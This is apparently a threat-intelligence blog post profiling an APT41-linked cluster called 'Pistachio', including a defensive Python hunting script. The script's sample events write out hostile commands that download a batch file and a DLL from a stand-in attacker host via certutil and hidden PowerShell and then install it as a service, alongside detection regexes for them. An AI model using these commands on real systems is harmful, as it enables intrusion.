The ice cream blog series continues by documenting another activity cluster first observed in our dataset in 2019. This threat cluster has been well documented in the security community, with APT41, Lead, Wicked Panda, and Vanadinite demonstrating significant overlap in activity, making it likely that each represents activity involving the same threat group. We are grateful for the contributions of these and other threat researchers who have helped inform the security community’s understanding of this actor.
To catch up on the rest of the series, click the links below:
- Intro: Threat Activity Clusters
- Cluster 1: Mint
- Cluster 2: Mint Sprinkles
- Cluster 3: Strawberry
- Cluster 4: Strawberry Sprinkles
This prominent APT has a footprint across numerous organizations, and the information shared has aided Alert Logic in detecting malicious actions within our customer base.
During our constant threat hunts, we have gleaned information that may complement the existing understanding of this group, due to our unique insight into 40PB of customer threat data ingested monthly. This blog will share Alert Logic’s perspective of this advanced persistent threat.
APTs are difficult to detect and even harder to track, as they recycle and modify indicators and TTPs to evade detection and increase their success rate. Therefore, the activity we have observed is better understood as this flavor tending to perform the documented actions rather than following a definitive pattern. This is a distinct difference from the previous threat flavors documented in this series.
A sophisticated threat deserves a sophisticated flavor, so the Alert Logic identifier for this activity cluster is Pistachio.
Alert Logic threat hunters identified Pistachio during our emerging threat process when active exploits of CVE-2019-19781 and CVE-2021-26084 first surfaced in January 2020 and September 2021, respectively.
This flavor would target exposed Confluence servers and Citrix ADC systems, usually preferring to compromise Windows-based systems used by organizations in the healthcare, telecom, technology, and video game industries. The Confluence and Citrix ADC exploits allowed full remote code execution, effectively granting the group complete control of the vulnerable server.
Installation and C2
In the instances where Pistachio was observed among Alert Logic customers, the flavor gained initial access and then abused certutil.exe as part of a “living off the land” attack, using the native command line program intended for certificate services to download a batch script (x.bat) from a host controlled by the group.
The batch script runs commands via PowerShell to download further programs, including a dynamic link library (DLL), which is then installed as a Windows service.
The malicious service DLL is unpackaged to launch Cobalt Strike to establish command and control (C2) of the compromised machine. The flavor also uses the known hacker tool, Metasploit, usually to advance further into the network. The C2 profiles observed were intended to look like benign internet traffic and were unlikely to be caught or blacklisted when viewed in isolation.
Utilizing native programs (certutil and PowerShell) helps to bypass preventative controls (such as EDR), as the attacker’s activity masquerades as that of a legitimate program.
It is worth noting that the certutil abuse and subsequent file download(s) were caught during routine threat hunting, not as part of a focused emerging-threat hunt. Searching for signs of compromise like this helped provide early warning of the Citrix and Confluence emerging threats.
While those exploits were brand new at the time, threat actors cannot rely entirely on novel tactics throughout the kill chain. This demonstrates the necessity to hunt across the kill chain and the complementary relationship of pairing advanced detection capabilities with preventative tools.
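The hunt described above, as an added example (not Alert Logic’s code): it scans constructed Sysmon-style process-creation records for the three installation stages Pistachio used (certutil download of a .bat, a PowerShell download cradle, a DLL registered as a Windows service) and reports both single-stage hits worth a hunter’s look and hosts where the full chain appears in order. Hostnames, URLs and command lines are hypothetical.

```python
"""Hunt process-creation telemetry for the certutil -> PowerShell -> service-DLL chain."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Ordered chain stages; each pattern is matched against the process command line.
STAGES = [
    ("certutil_bat_download", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\.bat\b", re.I)),
    ("powershell_download", re.compile(r"\bpowershell(\.exe)?\b.*(downloadfile|downloadstring|invoke-webrequest)", re.I)),
    ("service_dll_install", re.compile(r"(\bsc(\.exe)?\s+create\b.*\.dll\b|\breg(\.exe)?\s+add\b.*ServiceDll)", re.I)),
]

# Constructed sample events (Sysmon Event ID 1 style); hosts and URLs are hypothetical.
SAMPLE_EVENTS = [
    {"ts": "2021-09-02T10:00:05", "host": "web01",
     "cmd": r"certutil.exe -urlcache -split -f http://attacker.example/x.bat C:\Windows\Temp\x.bat"},
    {"ts": "2021-09-02T10:00:14", "host": "web01",
     "cmd": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://attacker.example/s.dll','C:\\Windows\\Temp\\s.dll')\""},
    {"ts": "2021-09-02T10:00:20", "host": "web01",
     "cmd": r'sc create WinSvcUpd binPath= "rundll32.exe C:\Windows\Temp\s.dll,Start"'},
    {"ts": "2021-09-02T10:02:00", "host": "build02",
     "cmd": r"certutil.exe -hashfile C:\build\installer.msi SHA256"},  # benign certutil use
    {"ts": "2021-09-02T11:30:00", "host": "app03",
     "cmd": r"certutil -urlcache -f http://attacker.example/x.bat x.bat"},  # stage 1 only
]

def classify(cmd):
    """Return the first chain stage whose pattern matches the command line, else None."""
    for name, pattern in STAGES:
        if pattern.search(cmd):
            return name
    return None

def stage_hits(events):
    """Map host -> {stage: first timestamp}. A lone stage-1 hit is still a hunting lead."""
    hits = defaultdict(dict)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stage = classify(ev["cmd"])
        if stage:
            hits[ev["host"]].setdefault(stage, datetime.fromisoformat(ev["ts"]))
    return hits

def find_chains(events, window=timedelta(minutes=15)):
    """Hosts where every stage appears, in order, within the window: high-confidence alert."""
    order = [name for name, _ in STAGES]
    alerts = []
    for host, seen in stage_hits(events).items():
        if all(s in seen for s in order):
            times = [seen[s] for s in order]
            if times == sorted(times) and times[-1] - times[0] <= window:
                alerts.append(host)
    return alerts
```

Running `find_chains(SAMPLE_EVENTS)` flags only web01, while `stage_hits(SAMPLE_EVENTS)` also surfaces the lone certutil download on app03, which is the kind of early signal the paragraph above describes.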
Flavor infrastructure is where we have seen the greatest variance. Pistachio frequently moves onto new attacker infrastructure to carry out actions across the kill chain. Monitoring attacker IPs has proven to be inefficient long term, as they are usually only active during small windows.
Pistachio appears to have the ability and resources to take over new hosts and use these in their campaigns. This includes using routers, or an organization’s compromised hosts to take control of more infrastructure, both internally and externally. This is a stark contrast to previous actors we have observed, such as Strawberry, who simply spin up new hosts within the same AWS hosted VPC.
Pistachio, under its many other names, has been assessed by other threat researchers as likely a Chinese state-sponsored group, based on targeted intrusions tending to align with Chinese Communist Party objectives. Alert Logic has no data to support this attribution, but it has assisted our understanding of the activity cluster.
The geo-locational data of the IP addresses recorded in our dataset and in open-source intelligence cover a wide variety of countries, with a notable lack of Chinese addresses. The geo-locational data, coupled with the frequent renewal of attacker infrastructure, has led Alert Logic threat hunters to theorize that there may be a concerted effort to use fewer Chinese IP addresses in order to mask attribution.
Actions on Objectives – and a thank you to OSINT
We have not observed any specific AOs in the Alert Logic customer base, thanks to the work of our threat hunters and the intelligence provided by the wider security community, which has enabled us to act quickly when compromise was observed.
Known Exploits Used
- CVE-2021-26084 [exp]
- CVE-2019-19781 [exp]
Tools
- Bat files
MITRE ATT&CK Techniques
- Masquerading: Masquerade Task or Service – T1036.004
- Create or Modify System Process: Windows Service – T1543.003
- System Services: Service Execution – T1569.002
Targeted Systems
- Confluence servers
- Citrix ADC
Targeted Industries
- Telecom Organizations
- Technology Companies
- Video Game Studios
Indicators of Compromise
- 213[.]152[.]165[.]29 [inst]
- 4245c6e0b025d5e34b8aec767bf1d2aa085b7554 (SSL certificate)
Actions on Objectives
n/a in the historic Alert Logic dataset